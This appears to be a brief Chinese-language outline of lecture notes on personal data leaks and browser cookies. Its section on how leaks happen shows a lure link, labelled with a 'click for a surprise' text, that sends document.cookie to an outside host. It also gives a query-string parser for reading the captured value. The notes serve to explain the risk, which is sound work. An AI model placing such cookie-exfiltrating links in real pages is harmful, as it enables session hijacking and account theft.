
一、信息泄露常见场景
1.1 手机号码泄露导致的骚扰短信或电话

1.2 不同的平台账号被盗后用于群发非法信息



二、cookie
2.1 什么是cookie
2.2 登录及访问网站的流程

2.3 如何跨浏览器使用cookie



三、信息是如何泄露的?
3.1 点击不明链接
<a href="">猜你喜欢,点我有惊喜</a>
3.1 通过JS获取cookie
document.cookie
<a href="javascript:location.href='http://www.baidu.com?'+document.cookie">猜你喜欢,点我有惊喜</a>
3.2 从地址栏获取参数并进行截取
function GetQueryString(name)
{
var reg = new RegExp( "(^|&)" + name + "=([^&]*)(&|$)" );
var r = window.location.search.substr(1).match(reg);
if (r!= null ) return unescape(r[2]); return null ;
}
// 调用方法
alert(GetQueryString( "参数名1" ));